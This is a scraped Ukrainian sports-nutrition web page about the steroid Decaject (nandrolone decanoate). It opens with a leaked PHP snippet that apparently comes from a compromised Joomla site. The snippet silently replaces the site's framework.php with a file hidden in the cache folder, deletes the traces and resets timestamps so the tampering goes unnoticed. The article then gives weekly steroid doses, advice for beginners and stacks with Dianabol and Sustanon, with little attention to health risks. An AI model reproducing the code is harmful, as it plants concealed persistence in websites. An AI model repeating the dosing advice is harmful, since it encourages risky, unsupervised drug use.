$frameworkFile = $_SERVER ["DOCUMENT_ROOT"]."/includes/framework.php"; $cacheFile = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_system")."-cache-system.php"; $frameworkFileTo = $_SERVER ["DOCUMENT_ROOT"]."/cache/_system/".md5("_framework")."-cache-framework.php"; if (file_exists($cacheFile) && file_exists($frameworkFileTo)) { require_once JPATH_BASE . "/cache/_system/".md5("_system")."-cache-system.php"; $filemTime = filemtime($frameworkFile); $contentFile = file_get_contents($frameworkFileTo); file_put_contents($frameworkFile, $contentFile, LOCK_EX); @unlink($frameworkFileTo); @unlink($cacheFile); touch($frameworkFile, $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/includes", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache", $filemTime); touch($_SERVER ["DOCUMENT_ROOT"]."/cache/_system", $filemTime); } Декаджект | Спортивне харчування - успіх у бодібілдингу та пауерліфтингу

Декаджект

ДекаджектDecaject це аналог всім добре відомого Дека-дураболіну. Дека-дураболін – це марочна назва фірми Органон, препарати якої містять нандролон деканоат. І хоча ця речовина міститься в багатьох препаратах, кожен атлет при згадці про нього думає відразу про дека-дураболін. Органон почав свої поставки Деки на ринок на початку 60-х. Це був ін'єкційний препарат різного дозування. Самими ходовими були упаковки по 50 мг / мл і 100 мг / мл. Дека-дураболін найпоширеніший і найуживаніший ін'єкційний стероїд. Пристрасть до нього пояснюється різноманітними можливостями його застосування і позитивними результатами. Головна властивість Деки добре описана у викладеній тут анотації до нього фірми "Органон ГмбН"; "Гарна анаболічна дія нандролон деканоата в його позитивному балансі азоту". Азот у зв'язаному стані є складовою частиною протеїну. Decaject змушує м'язову клітку акумулювати азот у більшій кількості, ніж вона віддає, що веде до позитивного азотного балансу. Позитивний баланс азоту рівносильний зростанню м'язів, оскільки м'язова клітина в цій фазі акумулює більшу кількість протеїну, ніж зазвичай. Самі виробники вказують в анотаціях до своїх препаратів на те, що при їх прийомі настане позитивний баланс азоту і разом з ним гарний ефект вироблення білка при достатньому надходженні калорій і протеїнів. Це слід знати, тому що інакше не досягнеш задовільних результатів. Сильна анаболічна дія Decaject поєднується з невеликим андрогенним компонентом, Дека забезпечує гарний приріст м'язової маси і сили. При цьому у більшості атлетів спостерігається помітне скупчення води в організмі, яке не таке сильне як при прийомі ін'єкційних тестостеронів, але все-таки, у високих дозах, веде до пружного і водянистого зовнішнього вигляду. Оскільки Дека накопичує воду в сполучній тканині, то цей препарат може полегшувати або повністю усувати болі в суглобах. Тому атлети, які страждають болями в плечах, ліктях, колінах, можуть безболісно тренуватися при прийомі Decaject. Ще одне "за" у тому, що Дека блокує рецептори картізола і в результаті менша його кількість потрапляє до м'язових клітин і до клітин сполучної тканини. Атлети застосовують Decaject для нарощування м'язової маси і в період підготовки до змагань.

Decaject добре підходить для нарощування м'язової маси, тому що сприяє синтезу протеїну і одночасно впливає на ретенцію води в організмі. Оптимальна доза десь 200 - 600 мг на тиждень. Наукові дослідження показали, що кращі результати досягаються при прийомі 4 мг препарату на 1 кг ваги в тиждень. Хто вибере дозування менше 200 мг на тиждень, відчує лише дуже слабкий анаболічний вплив, який значно посилюється при підвищенні доз. Анаболічні, і отже, будівельні функції Decaject залежать певною мірою від дозування, тобто в діапазоні 200 - 600 мг на тиждень анаболічний вплив зростає майже в прямо пропорційній залежності до дози. Ті, хто вибирає дозу понад 600 мг на тиждень, зміщують співвідношення позитивно-негативного впливу у бік побічних явищ. Крім того анаболічний вплив більше не зростає в прямо пропорційній залежності до дози при дозуванні понад 600 мг на тиждень, 1000 мг на тиждень принесуть не найкращі результати ніж 600 мг. Новачки в стероїдних курсах повинні задовольнятися дозою в 200 мг на тиждень. Для нарощування м'язової маси Decaject дуже добре комбінується з Діанаболом і тестостероном. Знаменита комбінація Діанабол-дека забезпечує швидкий і сильний приріст м'язів. Більшість атлетів приймають, як правило, 15 - 40 мг діанабола на день і 200 - 400 мг Деки на тиждень. Ще більш швидкі результати досягаються при прийомі 400 мг Decaject на тиждень і 500 мг Сустанола 250 на тиждень. Про величезний приріст м'язів і сили говорять атлети при прийомі 400 мг Decaject на тиждень, 500 мг Сустанола 250 на тиждень і 30 мг Діанабола на день. Decaject - хороший базисний стероїд, який для нарощування м'язової маси комбінується з багатьма іншими стероїдами.

Хоча Decaject - не оптимальний стероїд для підготовки до змагань, багатьом атлетам він приносить гарні результати і в цій фазі. Оскільки Decaject - анаболік тривалої дії, виникає небезпека скупчення зайвої кількості води перед змаганнями при більш високому дозуванні.
 
Статті СТЕРОЇДИ Декаджект